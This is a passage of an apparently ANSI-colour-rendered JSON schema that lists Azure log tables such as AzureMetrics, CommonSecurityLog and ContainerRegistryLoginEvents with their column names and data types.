\u001b[94m\"startTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"status_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tags_LogicAppsCategory_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"workflowId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureMetrics\"\u001b[39;49;00m: {\n        \u001b[94m\"Average\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Count\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Maximum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Minimum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Total\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UnitName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"CommonSecurityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalExtensions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationProtocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommunicationDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomDate2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomFloatingPoint4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomIPv6Address4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomNumber3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString3Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString4Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString5Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceCustomString6Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceEventClassID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceExternalID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceFacility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceInboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceMacAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceNtDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceOutboundInterface\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DevicePayloadId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceProduct\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTimeZone\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVendor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"EventCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexDate1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber1\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FlexNumber2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString1Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FlexString2Label\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileCreateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileModificationTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFilePermission\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OldFileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalLogSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Protocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceiptTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestClientApplication\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestContext\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCookies\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"SimplifiedDeviceAction\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceNTDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceTranslatedPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceUserPrivileges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatConfidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ComputerGroup\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Group\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryLoginEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JwtId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ContainerRegistryRepositoryEvents\"\u001b[39;49;00m: {\n        \u001b[94m\"ArtifactType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Digest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MediaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Region\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Repository\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Size\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tag\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksAccounts\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestParams\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Response\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"DatabricksClusters\"\u001b[39;49;00m: {\n        \u001b[94m\"ActionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        